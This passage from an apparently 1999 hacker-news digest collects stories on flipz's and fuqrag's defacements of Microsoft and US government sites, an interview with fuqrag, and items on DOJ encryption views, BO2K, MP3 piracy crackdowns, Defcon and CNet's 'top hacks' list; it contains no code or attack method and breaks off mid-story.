This article was put together in the ten or fifteen minutes after I got off the
phone with Flipz. This article is to be considered a work in progress and
will be updated and mantained throughout the day as more work can be
done on it.


MSNBC;

Don’t blame love for Microsoft hack
Teen tells MSNBC that personal problems drove him to deface
By Mike Brunker
MSNBC

Oct. 27 — The hacker who broke into Microsoft’s
computers and publicly bragged about it says it
was personal problems — not unrequited love —
that led him to attack the computer giant. “Some
bad things have been happening in my life and I
just figured I’d go on the Internet and escape
reality and see how much trouble I can get into,”
the hacker, who gave his age as “under 16,” said
Wednesday in an interview with MSNBC, hours
after he vandalized four more government Web sites.

THE HACKER, who uses the handle “flipz,” on Tuesday
became the first person known to have defaced one of
Microsoft Corp.’s computers after he left electronic graffiti on
the company’s Conference Management Server site. He also
is responsible for vandalizing at least 10 government Web sites
since Oct. 20.
Sources at the Redmond, Wash.-based company said the
hacked machines were not part of the corporate network, but
rather part of a “direct-tap network” used by developers and
partners for testing purposes. Though efforts are made to keep
them secure, these computers are connected directly to the
Internet, and are one step removed from Microsoft’s
corporate network, the sources said. (MSNBC is a
joint-partnership between Microsoft and NBC News.)
In a phone interview Wednesday, flipz confirmed his
identity by providing details of a previously unreported
intrusion into the Web site of a leading Internet search engine.
His account was subsequently confirmed by officials at the
company on the condition that the site not be identified.

REPORTED, BUT NOT DOCUMENTED
Attrition.org, a reliable computer security site that
maintains an archive of hacked Web sites, also confirmed that
flipz reported he had vandalized the site, but it was not
documented because the hacked site was removed before
evidence could be gathered.
Flipz took issue with the MSNBC’s portrayal of him as a
“lovesick hacker” in a story Tuesday reporting the Microsoft
break-in, a description based on what appeared to be love
notes for another hacker known as “f0bic” that he left on some
of the sites he vandalized. “Flipz was here and f0bic, your
seksi (sic) voice helped me through the night,” read one note
left on the Microsoft Web page, which concluded with a threat
against CEO Bill Gates.


“That was just a bit from ‘Austin Powers.’ We don’t have
a sexy relationship or anything. He’s just like my friend,” flipz
said, adding that f0bic, a member of the apparently defunct
hacking group Spl0it, had nothing to do with his intrusions.
The hacker was vague on many specifics about his life
and the reasons for the attacks — he would only say he lived
on the West Coast, he declined to give his age except to say
he is “under 16,” and he refused to provide specifics of how
he was able to gain entry into the NT servers, though he said
he had been trained as an NT operator.

HACKING IS ‘LIKE A DRUG’
He blamed unspecified personal problems for the spate of
intrusions, adding that staying up all night hacking was “like a
drug” that allows him to forget about life’s demons.
“You just forget everything. Everything. You can’t
remember your name and s—-. Everything changes.”
He said his parents were not concerned about his
nocturnal activities, noting that they had told him, “Get good
grades, don’t drop out of school and we’ll be happy.”
As he has indicated in messages left on several of the
hacked sites, flipz said he expected to be arrested as a result
of his hacking spree.
“I was expecting to get raided yesterday, but nothing
happened so I don’t know. ... I’m a minor so I’m not really
worried about that,” he said.
The FBI declined to say whether flipz was under
investigation, but a spokesman for the White Sands Missile
Range said the Army Criminal Investigation Command was
looking into the attacks on the service’s computers.

FOUR MORE FEDERAL SITES HIT
The young hacker continued his assault on federal sites
Tuesday night, altering the two Department of Energy sites, the
Hanford Nuclear Reservation and the Office of Procurement
and Assistance Management; the Navy Coastal Systems
Center and Anderson Air Force Base, according to
attrition.org.
In the past week, he also has hacked the pages of the
U.S. Army Reserve Command, the White Sands Missile
Range, the U.S. Army Dental Care System, the Navy
Management System Support Office, the Substance Abuse
and Mental Health Services Administration and the
Department of Veterans Affairs.

MSNBC technology writer Bob Sullivan contributed to
this report.





@HWA


31.0 Flipz' exploit
~~~~~~~~~~~~~~

Flipz´ Exploit
10/28/99

Mike Hudack
Editor-in-Chief

Whenever I talk to someone about the recent spate of government Web
defacements one of the first things they ask me is if I know what exploit is
being used. The answer is invariably the same -- no. Everyone from eEye
to the FBI has asked the same question, and the answer is always the same.

The speculation runs from a repackaged eEye exploit to an FTP
vulnerability to a custom-made script written by Flipz himself. The answer
doesn´t seem to be presenting itself any time soon.

An Anonymous Source

An anonymous source intimately involved with Flipz and the development of
the exploit gave me a call only a few minutes ago. He says the following:

"flipz came up with the idea to the exploit, but he
doesn't know how to code himself. He then went to
someone, probably a member of the ADM Crew, who
wrote the actual exploit.

It's actually kind of recoded RDS, but [flipz and
the rest] not going to release the actual
vulnerability."

This source explained that F0bic was somehow involved in the
development of the exploit, but refused to elaborate on that.

Flipz´ Version

Flipz categorically refuses to tell me anything about his exploit, explaining
that he "can't tell [me] what I'm using." He would, however, say that it "isn´t
a hard-core exploit." Apparently it isn´t that complicated -- he says "if
someone sat down and looked at this exploit for a few hours they´d call
themselves stupid for not thinking of it. It´s very simple."

He says the idea came from an article in Buffer Overflow, the Hacker
News Networks´ original article section. "It was presented as theory in
Buffer Overflow. I just made it reality," he claims.

It´s interesting, however, that he has contradicted himself in his zeal to keep
his exploit secret. At one point he said "it´s a repackaged exploit," while
later he claimed it was from Buffer Overflow. It seems that it would have to
be one or the other.

The Federals

The FBI apparently has no idea what Flipz is using to deface these sites. I
was asked by two special agents, one in Washington DC and one in New
Haven, CT about what exploit he was using. Both made it relatively clear
they had no idea.

They seemed to know what they were talking about though, and asked me
about a few specific possibilities. I simply told them to check the site if they
wanted information. This is all I have to offer.

The IRC Opinion

In speaking with several security consultants on IRC, it´s pretty clear that
most people consider Flipz (and hence his friends) script kiddies. "It´s
almost certainly iishack," said one consultant on IRC.

The speculation almost refuses to touch the possibility that Flipz wrote the
exploit himself. "If anything, it´s repackaged," one person acknowledged.

Pretty much everyone refused to be quoted even by pseudonym, saying
they weren´t one hundred percent certain. As we all know, in the security
community there´s something of a culture against uncertainty.

Changing Hands

Regardless of what the exploit may be, it has changed hands at least three
times. First Flipz had it -- whether he developed it, repackaged it, or
downloaded it. He then passed it on to F0bic (who, as far as OSAll can
tell, never used it). From there it went to Fuqrag, with Flipz´ permission.

@HWA



32.0 Fuqrag interview
~~~~~~~~~~~~~~~~

From OSALL


Interview With NSA Defacer
10/28/99

Mike Hudack
Editor-in-Chief

There have been two firsts in the world of Web site defacements in the last
two days. First Flipz defaced defaced a Microsoft server for the first time in
history. This flooded the Attrition Mirror with traffic -- more than nine gigs of
it. Now someone who calls himself Fuqrag has defaced a National Security
Agency Web site.

The site defaced by Fuqrag, the Defense Information School, was left largely
intact on the face. A splash page asking users to click through was left
identical to the original version -- but the page people clicked through to
contained the following message:

fuqrag 0wnz the DoD!! hello to: hst, vghk, dayzee,
zi, flipz, f0bic, microwire, and oclet .. this site
was edited by fuqrag .. hakked for cristyn!!!

The National Security Agency is responsible for cryptological security for the
United States government and is usually responsible for computer security
tasks as well. Yesterday there was speculation that an NSA site was
defaced but it turned out to belong to the Navy. Today an NSA server was
actually defaced.

OSAll spoke with fuqrag, who agreed to a phone interview on the condition
that recordings wouldn´t be kept.

Why Deface?

Fuqrag has, like flipz, gone on something of a defacement rampage in the last
few days. Government, military and more servers have fallen to him -- and
all after flipz gave him an exploit to use.

"Normally I´d stay away from [defacement] -- I haven´t defaced anything for
like two years," he told me. His girlfriend, Cristyn, had just broken up with
him, and that´s why he started the defacements, he said.

"At this point... it´s like what the hell. If Armageddon came tomorrow, that´d
be a good thing," he said. "I used to think defacing servers was lame, but
now I think it´s fun," he treats it as a way to strike out at a world that´s
closing in on him.

"I´ve got three pscyhologists who´ll tell you I´m insane..." he said as he
explained why he wouldn´t be spending much time in prison. "I think I´ll
probably get raided though -- but no matter what, I won´t be spending much
time in prison."

Targeting the Government

According to fuqrag, "I didn´t know it was NSA... But that´s pretty damn
cool." He was simply going for "anything with .gov or .mil in the URL," he
explained.

"I don't hate our country I hate the government. They're always trying to
control everything... the greatest freedom we've ever had is the internet and
they try to control it," he explained. He has a particular dislike for the Navy
because "[his father] was twenty-three years naval intelligence and they really
fucked him up."

Brushes With the Law

Fuqrag has been raided at least once previously for "carding and cell
cloning." He was brought to a local FBI field office and interviewed for
almost an entire day, at which point he says he was offered a job. "I thought
about it for a day or two and told them no."

"I was actually really lucky... I had like two million pairs [cell phone cloning
information] on zip disks, along with some cells sitting in a drawer." The FBI
agents didn´t open the drawer, however, leaving them with no evidence
against Fuqrag.

Member of gH

Fuqrag is also a member of global Hell, a rather famous group who have
defaced numerous sites, including the White House Web site. He says he´s
"the oldest member of gH, and probably the oldest member they´ll ever
have," at 30.

gH is, of course, famous for the White House defacement and the numerous
FBI raids that followed.

More to Follow

Flipz, Fuqrag and several others have a "custom exploit flipz wrote" that
they´ve been using against the Windows NT boxes. If either one of them
gets raided there are plans to post the exploit on the Net "with a message
telling every [script] kiddie to start using it."

In addition they claim to already have administrator (root on *nix boxes)
access to many high profile sites, including Barnes & Noble and Comp
USA. Fuqrag also says he´s working on defacing MTV.com.

In addition, they say they´re going to start sending a message with their
defacements. "We haven´t really said anything," fuqrag explained, "we´re
going to start talking."

@HWA

33.0 Privacy and Encryption Labeled Antisocial By DOJ
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
For some reason this hasn't made much press but it
looks like the DOJ considers privacy and encryption
antisocial. According to Scott Bradner, an Internet
Engineering Task Force area coordinator, someone high
up in the DOJ told him that if the IETF was to support
encryption it would be an 'antisocial act.'

Actually, private property is antisocial. Under socialism,
there is no private property.
Ayn Rand said in The Fountainhead "Civilization is the
progress toward a society of privacy."

Wired - It is buried on the second page
http://www.wired.com/news/politics/0,1283,31937,00.html

How MS' Junket Paid Off
by Declan McCullagh

3:00 a.m. 16.Oct.1999 PDT WASHINGTON -- When Microsoft invited free-market
allies to its campus last month, its PR flacks billed the all-expense-paid
junket as an information-sharing session.

But some critics aren't so sure.

Just after attendees got home, they fired off a letter to Congress
suggesting that the budget of the Justice Department's antitrust division
should be pared down a little. Or, perhaps, maybe a lot.

Now, it's fair to say that groups like Citizens for a Sound Economy,
Citizens Against Government Waste, and the National Taxpayers Union are
hardly fans of aggressive antitrust enforcement, and -- if they had gotten
around to it -- would have sent the letter on general principles.

But it's probably also true that getting fat checks from Microsoft
provided an additional incentive to make some time.

No matter, says Al Foer, president of the American Antitrust Institute,
who calls it coercion.

"With negotiations reportedly under way to resolve the government's case,
Microsoft's salvo is clearly an attempt to leverage its position through
intimidation.... This lobbying effort is part of a longer-range strategy
to keep the government from applying the Sherman Act to the high
technology industry of the future -- which Microsoft hopes to continue to
dominate," he said in an email message Friday.

Meanwhile, Microsoft hasn't been idle. "Microsoft called us today and
wanted us to start writing letters to the Hill," said a source close to
one group that receives funds from MS. "Nobody was quite sure what that
would accomplish."

YEAH, GOOD LUCK: Lisa Dean has an unlikely goal: To persuade her fellow
conservatives to abandon their long-standing quest to rid the Net of
anything that might make your grandmother blush.

As vice president of Paul Weyrich's Free Congress Foundation, Dean has
recently been busy opposing a bill requiring federally funded libraries
and schools to install filtering software. The bill, championed by Ernest
Istook (R-Oklahoma), is part of a juvenile justice bill that
Congress is in the final stages of considering.

"I'm trying to get conservatives to see what Istook is doing is a
precedent for giving Washington control. Then someone else comes in later
and says we've got to filter gun sites. Then the tobacco industry gets
filtered and then comes fast foods," Dean says.

"That's the attitude of the right. As long as they get rid of pornography
that's all they care about."

UNCERTAIN ALLY: When the White House hired law prof Peter Swire this
spring, top officials proclaimed him to be the administration's chief
privacy czar, and assured civil libertarians that Swire would be their
inside ally.

But that hasn't turned out to be the case. Instead, Swire has made a point
of defending the Clinton administration's privacy misdeeds.

"Their MO is to send out their privacy guy Swire," complains one
disgruntled privacy advocate.

Swire was scheduled to testify for the administration at a House committee
hearing on Thursday, but it was postponed until November.

The topic: FidNet, the controversial plan that would include ongoing
government surveillance of the Internet.


TRADEMARK TUSSLE: Law professors are urging the US House of
Representatives to delay voting next Tuesday on the Trademark Cyberpiracy
Prevention Act.

In a letter sent to Speaker Dennis Hastert late Friday, they said the bill
unfairly expands the rights of trademark owners far beyond any given under
existing law, and benefits corporations at the expense of individuals.
Signers include Harvard University's Lawrence Lessig, Georgetown
University's Julie Cohen, and University of Miami's Michael Froomkin.

PRIVACY IS AN "ANTISOCIAL ACT": Scott Bradner wasn't surprised to hear the
FBI say this week that they wanted an easily wiretappable Internet.

The veteran Internet Engineering Task Force area coordinator and Harvard
University networking guru has already had his arm twisted by the Feds.

It happened when the IETF decided to wire encryption into the
next-generation Internet protocol, IPv6.

"Someone very high up in the US Justice Department told me that week that
for the IETF to support encryption was an 'antisocial act,'" Bradner said.

TELL US WHAT YOU REALLY THINK: Debate is getting snarly on a mailing list
the IETF created to debate whether the Net should be tappable for the Feds
-- or, for that matter, non-US police too.

So far, support for the scheme seems to be coming mostly from telephone
companies.

"Can we just write the preface that says this is a useless disgusting,
repugnant thing, but if we need to do it, this is how we do it, and get on
with doing it?" wrote one engineer.

Big mistake. Soon libertarians were flaming him and his allies
mercilessly. "I'd like to step back one step from the technical
discussions of which variant of Zyklon B is most effective, to discuss the
question of whether this is a good idea anyway," wrote longtime
cypherpunk Adam Back, making a reference to the poisonous gas used by the
Nazis.

Back's solution: A no-cooperation approach.

BEWARE TECHNOCRATS: What's the only thing worse than having US government
bureaucrats dictate Internet standards? Answer: Having international
government bureaucrats do it.

That's what the International Telecommunications Union, a paragon of
byzantine bureaucracy, is planning. Yoshio Itsumi, secretary general of
ITU, said at the Telecom 99 forum in Geneva that he was itching to get
into the job of influencing standards like domain name
administration.

One longtime ITU critic sent us a four-point criticism of the plan.

In interests of brevity, here's point Numero Uno: "They did everything
possible to prevent [the Internet from] coming into existence - ranging
from banning private international user networks, preventing the lease of
private circuits for Internet use [and when that began to fail, jack
up prices so high it had the same effect], promulgating alternative
standards that were mandated for use rather than Internet standards,
promulgating alternative services, funding alternative implementations,
and basically bad-mouthing and banning the Internet from their forums and
dialogue."

Hey, if you think that's dense, be glad we didn't include points two
through four.

GOP.gov: Last week we told you about Republican Conference Chairman J.C.
Watt's candid "they-suck" appraisal of his colleagues Web sites.

Now he's decided to do something about it.

A project under development called "GOP.gov" will let party loyalists
craft their own myGOP.gov home page where they can receive the latest
Republican info on both local and national topics.

The forthcoming Web site will replace hillsource.house.gov.

The plan is for much of the news to be provided by GOP House press
secretaries.

@HWA

34.0 B02K Reviewed By WinNT Magazine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Windows NT Magazine has published an extensive
review of BO2K. WinNT Mag says that the open source
code, its ability to remote admin systems, and its
encryption features are all good but derides the product
for not having logging capabilities. (It is good to finally
seeing BO2K taken seriously)

Windows NT Magazine - Subscription required
http://www.winntmag.com/Articles/Print.cfm?Action=Print&ArticleID=7254

BO2K - They are having connection issues at the moment
http://www.bo2k.com

@HWA


35.0 MP3 Pirates Beware
~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The International Federation of the Phonographic
Industry (IFPI) has launched a major crack down on
internet MP3 pirates. Targeting hundreds of sites in over
20 countries the IFPI hopes to remove over 1 million
pirated songs from the internet. (This will do nothing but
drive them further underground.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2383311,00.html?chkpt=zdnntop

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Music execs threaten to kill MP3 sites
By Reuters
October 28, 1999 5:21 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2383311,00.html

LONDON -- The global music industry on Thursday outlined plans for a coordinated attack on
Internet piracy, taking action against hundreds of outlaw sites in more than 20 countries.

The International Federation of the Phonographic Industry (IFPI) said its strategy was aimed at
paving the way for artists and record companies to deliver music electronically and legally around
the world.

A global anti-piracy operation
The group's legal initiatives comprise moves to close illegal sites and delete unauthorized files in
countries around the globe from Japan to the United States, Argentina, South Africa and Europe.

"Today's enforcement campaign by IFPI shows that where Internet pirates are persistently
breaking the law, there is now a global anti-piracy operation which will stop them," said IFPI
Chairman Jay Berman.

However, the IFPI said there was an urgent need to introduce copyright legislation worldwide
specifically to protect against online piracy. The IFPI estimates there are some 1 million illegal
music files posted on the Internet.

The group's campaign targets two groups: people who are uploading
material on to the Internet, mainly in the MP3 format, and Internet
Service Providers who may be hosting illegal Web sites.

@HWA

36.0 Red Herring Reviews Defcon
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Tan
It is a little late but Red Herring Magazine has a review
of this years Defcon. They take an interesting view on
the changing face of the underground.

Red Herring
http://www.redherring.com/mag/issue71/news-security.html

Security
Hackers go corporate

By Niall McKay
Red Herring magazine
From the October 1999 issue

Mockery is catching. This year's Def Con hackers' conference had all the
corporate professionalism of a mainstream computer industry event. And the
more the hackers strove to subvert their commercial adversaries, the more
they became like the company they love to hate: Microsoft (Nasdaq: MSFT).

In July Las Vegas was crammed with hackers, crackers, self-proclaimed
security experts, "script kiddies" (novices), and "scene whores"
(groupies). High-profile groups gave ritzy, hour-long presentations on
their software tools, a PR agency pampered journalists in the pressroom,
and hacking supergroups like the Lopht and the Cult of the Dead Cow hawked
$20 T-shirts.

The star of the conference, the Cult, launched its hacking product Back
Orifice 2000 (a vulgar homage to Microsoft's BackOffice suite) in a slick
demo complete with electronic music and video presentations. Back Orifice
is not a hacking program, the Cult said, just a remote-administration
tool. In fact, it is a so-called Trojan horse program that, once
downloaded, can give a hacker complete access to any machine on a network.
"Back Orifice is just a tool, like a hammer," said its author, who goes by
the nickname of DilDog.

The smooth professionalism of Def Con '99 is just a sign of the changing
times. As the world embraces electronic commerce and as security issues
become paramount, sections of the hacker community are pushing to
legitimize themselves. Over the years, the Lopht has obtained an air of
respectability. It is a registered corporation, does consulting work for
security companies like Counterpane Systems, and has even testified before
the U.S. Senate on the security of government data.

But hackers' relationship with law enforcement remains an uneasy one.
Officials from the Federal Bureau of Investigation and the National
Security Agency attended but risked being picked out of the audience in
Def Con's traditional "Spot the Fed" contest. And Brian Martin, a
self-professed "ex-hacker" better known as Jericho, teaches a Hacker
Tracker course to FBI and NSA officials even though he's under
investigation for defacing the front page of the New York Times online
edition -- a charge he denies. ("But they still need serious help," he
says.)

So where is hacking headed next? Rumor has it that venture capitalists are
on the prowl for
investment-worthy hacker -- er, security -- startups.

@HWA

37.0 Hong Kong to Create Government Gateway
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
The Director of Information Technology Services for
Hong Kong, Lau Kam-hung, said that they will
strengthen security by establishing the Secure Central
Internet Gateway (SCIG). This Gateway will enable
government bureaus and departments to securely
access the internet. It will include firewalls, virus
detection systems and proactive intrusion detection
systems.

Asia Pulse
http://library.northernlight.com/FD19991026820000180.html?cb=0&dx=1006&sc=0#doc


Story Filed: Tuesday, October 26, 1999 10:52 PM EST

HONG KONG, Oct 27, 1999 (Asia Pulse via COMTEX) -- Promoting the awareness
of Internet-related data protection is an important goal of the
Government, the Director of Information Technology Services,

Mr Lau Kam-hung, said Tuesday. Speaking at a seminar on the protection of
data on the Internet today, Mr Lau said that personal data on the Internet
were vulnerable if they were not properly protected.

"White-collar criminals have taken advantage of the new business
opportunities brought by the rapid development and wide adoption of
Internet technology to commit crimes," Mr Lau said.

"Hackers and crackers are no strangers to us," he said. There had been 102
cases of hacking reported to the Police in the first seven months of 1999,
compared with 13 cases in the whole of 1998.

In order to keep its own information infrastructure secure, government
bureaux and departments follow a set of security guidelines to protect
their information technology (IT) resources.

Mr Lau said: "We will strengthen the security by establishing the Secure
Central Internet Gateway (SCIG) to enable government bureaux and
departments to gain access to the Internet, to disseminate information and
to communicate with the public over the Internet through a secure
and centrally managed gateway."

"The SCIG, to be set up early next year, will adopt internationally
accepted Internet security standards, and will protect government bureaux
and departments by means of firewalls, virus detection systems and
proactive intrusion detection systems," he added.

Mr Lau also pointed out that the "Digital 21" IT Strategy had laid down
several initiatives to facilitate the conduct of business and other
transactions securely on the Internet.

Meanwhile, the Government is working towards the development of a Public
Key Infrastructure (PKI) to provide a framework for authenticating the
identity of participants performing electronic transactions in Hong Kong.

The PKI will not only allow government services to be delivered securely
over the public networks, it will also lay a foundation for the delivery
of electronic services of other organisations.

"To protect consumer interests and enhance users' confidence in electronic
transactions, my department is going to set up a Certification Authority
Recognition Office by the end of the year," Mr Lau said.

He noted that Certification Authorities (CAs) were free to apply for
recognition on a voluntary basis, but only those CAs which had achieved a
trust standard and adopted a common and open interface in their operation
would be recognised.

The Government also introduced the Electronic Transactions Bill into the
Legislative Council in July this year, to provide the necessary legal
framework for the conduct of electronic transactions in Hong Kong.

(Hong Kong Government Information Service.) ASIA PULSE

Copyright © 1999 Asia Pulse Pte Ltd

@HWA


38.0 .mil and .gov Defacements on the Increase
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Ender Wiggin
If you haven't been paying attention recently the
number of government and military web sites that have
been defaced has increased dramatically over the last
few days. They have been twelve such defacements in
the last 24 hours including the second defacement of
US Army Reserve Command.

Attrition Mirror
http://www.attrition.org/mirror

Fuqrag, the guy who defaced a server hosted at Fort
Meade (headquarters of NSA) has granted an interview
with OSALL.

Fuqraq Interview - via OSALL
(see elsewhere this issue)

39.0 CNet Chooses Top Ten 'Hacks'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sarcastro
CNET.com did a feature report on the top 10 greatest
hacks of all time, of course by 'Hack' they mean some
sort of illegal activity. Somehow the Morris Worm only
made number 10 and they completely missed the
Chinese Human Rights defacement. Not to mention that
this is more of a cheap stunt to get advertising revenue
by placing each of the ten on its own separate page. So
to save you the aggravation here are the top five that
they chose, 5. InterNic redirection to AlterNic, 4. Air
Tran defacement, 3 New York Times Defacement, 2.Drudge
Report Defacement, 1. War Games the movie
(How did that get there?) Anyway unless your bored this
morning don't bother reading this.

C | Net

http://home.cnet.com/specialreports/0-6014-7-1420567.html?tag=st.cn.1fd2.
tlpg.6014-7-1420567

A CNET Special Report
By Matt Lake
(10/27/99)

Hackers. You can't even use the word without ticking someone off.
Upholders of the status quo hate that the existing state of affairs is
being undermined by sociopathic cybervandals. Old-school hackers think of
their work as exploratory and prefer to call people who break into servers
for mischief crackers.

But it's those mischief makers who get attention. Their hacks make the
front pages of world newspapers and cause fear and hysteria. Among these
types of hacks, there are gradations of severity. Some hacks pose a
threat to
national security; some hacks are merely an annoying form
of political activism.

For this retrospective, we selected some of the most creative, subversive
work by these Web "hacktivists." You'll find examples of mischief dating
from the early days of computing to the latest antiestablishment
outbursts. Rather than
trying to cause any serious trouble, many of
the nouveau crackers we selected like to target Web sites they oppose for
political reasons, such as those of big government, business, or
organizations whose political views are at loggerheads with their own.
This breed of hacktivists raises a smile from many who share their
beliefs, even if their methods seem a little extreme.

One name you won't see here is that of hacker poster boy Kevin Mitnick,
who was indicted on 17 counts of computer fraud, wire fraud, damage, and
unauthorized access. The hacks he got caught for weren't merely public
displays of
bravado; they were more like industrial espionage.

Of course, we don't endorse hacking of any kind. But it's an integral
part of Web culture, and like anybody else, we love a sensational story.
So read on for our favorite hacks of all time.

It's 1988. Robert Tappan Morris, the 22-year-old son of a security
expert for the National Security Agency and a bit of a geek in his own
right, decides to write a benign program to map every server on the
Internet. Trouble is, he's not
that careful a programmer.

Check Your Math
His program, now known as the Worm, was supposed to
hop between servers on the Internet, copy itself onto each server, and
move on. However, a misplaced decimal point in the code made the Worm
copy itself not once but indefinitely on each server. More than 6,000
servers crashed--one out of every ten servers on the Internet at the
time. It took a full day to get the Net back online, by which time
network administrators wanted blood.

That's how Morris ended up being sentenced to three years of probation,
400 hours of community service, and a $10,000 fine. His defense attorneys
argued that the accident had not actually deleted files on any of the
servers, but that
was considered small comfort considering the lost
hours of service and the cost in administrator time to fix the problem.

Stupidity or Conspiracy?
Indeed, many considered his punishment
suspiciously lenient. Conspiracy theorists thought that Morris was just a
front man covering for the real perpetrators: his dad's NSA cronies. And
so, for the underground tech community, the great Worm attack of 1988 was
a twofold blessing: It showed how defenseless Net servers were, and it
pointed a suspicious finger at the community's enemy, the government.


The hacker community widely reviled the 1995 movie Hackers as being
totally unrealistic.

Hard Copy
So it was hardly a surprise when the movie's site got
hacked and the perpetrators replaced glowing Hollywood-style promo copy
with a scathing parody of a movie review: Dade is a half-wit actor who's
trying to fit in to his new role. When a seriously righteous hacker
uncovers MGM/UA's plot to steal millions of dollars, Dade and his fellow
throwbacks of thespianism...must face off against hordes of
hackers....all with the aid of his Visa card. Want its number?

What was surprising was that MGM/UA kept the hacked site live, where it
remains to this day. The studio also posted a letter from the hacker,
which read, "I would like to offer an apology for my actions of last

night. There was no malice intended, I just got carried away. I
understand you may not appreciate the humor of my message; I agree, it
was in poor taste and went entirely too far." The message was so odd for
a supposed subversive hacker that some wondered if the studio itself had
been behind the hacking.

Jurassic Hack
The same question came up the next time a movie Web
site was attacked. Jurassic Park: The Lost World's site was hacked
shortly before the movie's release. CNN and CNET News.com posted the news
of a benign hack, which replaced the movie's trademark tyrannosaurus with
a duck and the legend "Duck World, Jurassic Pond."

Within 24 hours, a different story was out: online zine Beta pointed out
that the duck was a professionally rendered and functioning image map
with a time stamp two days earlier than the original Lost
World
graphic. The report concluded that "this was a publicity stunt and it's
pathetic." (The following day, Beta toned down its original message.)
Chances are, we'll never know for sure if these hacks were real.

But the incidents demonstrated that hacks had become a reliable way to
make the news--so reliable that commercial ventures might begin to co-opt
hackers' methods for publicity stunts.


In 1996, the biggest social issue in the online community was the
Computer Decency Act (CDA), an effort by the United States government to
control Internet content considered harmful to minors, specifically
pornography. Most of the Net community thought that the CDA veered into
censorship and was impossible to enforce, but only a dedicated few had
the gall to mess with the United States Department of Justice's Web site
to protest the law.

Legalese Becomes Hackspeak

The screed posted on the DOJ Web site in the early morning of Saturday,
August 17, 1996, was discovered by system administrators within
hours--but it took them two days to fix the site and restore it.
Meanwhile, visitors were treated to a supremely lengthy, often boring,
sometimes inspired parody of the DOJ's legalese statements about the
CDA, including the page title "U.S. (Japan's) Department of Injustice"
and a lot of sophomoric humor. For example:

SEC. 502. OBSCENE OR HARASSING
USE OF TELECOMMUNICATIONS
FACILITIES UNDER THE
COMMUNICATIONS ACT OF 1934.
Section 223 (47 U.S.C. 223) is

amended--(iii) any usage of the
word "bunny-rabbit" shall result
in a flogging of great
magnitude. If usage of the word
"bunny-rabbit" exceeds that of
forty-two, then the defendant
will be found guilty of heresy
and sentenced to [punishments
including]...forced coding in
Basic.

On the whole, though, the hack came off as puerile rather than witty. It
did reflect the Net community's intense opposition to the CDA, which was
eventually overturned by the Supreme Court.

While some hackers are interested mostly in crowing about their technical
prowess, others merely have strong opinions.

Virtual Red Paint
Take, for example, the Ghost Shirt Society. This
group of hackers attacked Kriegsman Furs and Outerwear in November 1996.
Kriegsman, an established luxury clothier, showed a full-length, white
fox fur coat on its opening page, with the slogan "Our materials and
design are steeped in tradition and alive with style." The animal rights
hacktivists changed that front page to show a monochrome picture of a
similar fur coat daubed in red and the words "fur is dead."



Like PETA activists who chuck red paint over customers as they leave
furriers, the Ghost Shirt Society thought of themselves as educative
rather than antagonistic. On the hacked page, they left links to sites
dedicated to the rights of
our four-footed friends, including
Envirolink.org's Animal Rights FAQ and the American Anti-Vivisection
Society.

A Most Moderate Radical
And in a rare case of restraint, they didn't
brag about how they "owned" the site's administrators--a typical hacker
boast. In fact, the opening paragraph of their revised front page was a
sympathetic and considerate apology to the technical staff:

I did not hack this site in order to cause trouble for anyone
(except maybe Kriegsman Inc.). I fully understand the
responsiblities of a system administrator and understand it is a
thankless job. This is in no way the
administrator's fault
(or whoever is in control of security at ShopTheNet). I tried to do
this as carefully as I could, in order not to cause any problems for
the site administrator(s). Anyway, this was done in the name of
animal rights.

Even leather-clad, carnivorous fur fiends couldn't help but notice this
moderate tone, though it was placed next to pictures of several cute baby
animals with the sentence "This is what fur looks like before the
gassing, clubbing, and
electrocution."

While no one was ever apprehended for this misdeed, the Kriegsman Furs
hack will go down in history. Instead of claiming the usual motivations,
such as self-aggrandizement, mischief, or the defense of some vague
doctrine about
digital freedom, these hackers led the way to hacking
as a form of nonviolent political opposition.

Spoofing is the interception and jumbling of information from a
content-providing Web server before it reaches a person browsing the
site. This type of content manipulation, very popular in 1997, is
relatively benign in that it doesn't
actually affect the original
server--and it's often very funny.

Interactive Hacking
Two of the best examples, in our opinion, were
smeG and MetaHTML's Zippy server. In both cases, visitors were willing
participants in the spoof. To start the fun, surfers would enter the URL
of any site they wanted spoofed into a form at the spoofing site.

The smeG server intercepted the content coming off a Web server and
turned it into a mirror image of itself--with words, images, and layout
all reversed. This made for some very perplexed surfers.

Harmless Gibberish
The Zippy server inserted random quotes from Bill
Griffith's aphasic cartoon character into the text of a page. At first
glance, the spoofed sites seemed perfectly normal. But as this Zippified
extract from the White House's site shows, they weren't:

Tipper Gore is the wife of Vice President Al Gore. I feel real
SOPHISTICATED being in FRANCE! She is a well-known child advocate
and actively involved with issues relating to mental health and
homelessness. How do
you explain Wayne Newton's POWER over
millions? It's th'moustache&have you noticed th'way it radiates
SINCERITY, HONESTY & WARMTH? It's a moustache you want to take home
and introduce to Nancy Sinatra!

To participate in the mayhem yourself, pay a visit to the MetaHTMLsite
and enter your favorite URL.

http://www.metahtml.com/apps/zippy/welcome.mhtml

When Network Solutions (also known as InterNIC) began charging $100 to
register domain names in 1995, the company didn't make many friends among
Web aficionados. Up until then, registering and maintaining domain names
was
free, and people objected to the fact that one company
controlled so much Web real estate.

There were a few alternatives to the InterNIC, one of which was AlterNIC,
the brainchild of archhacker Eugene Kashpureff. AlterNIC offered a
different way to register domains, but since InterNIC had a lock on .com
domains, AlterNIC
used alternatives, such as .ltd and .sex.

Please Use Alternate Route
In July 1997, Kashpureff used his
knowledge of the domain name system (DNS) to divert traffic from Network
Solutions. For one whole day, people who entered www.internic.net into
their browsers found themselves not at the official domain registry but at
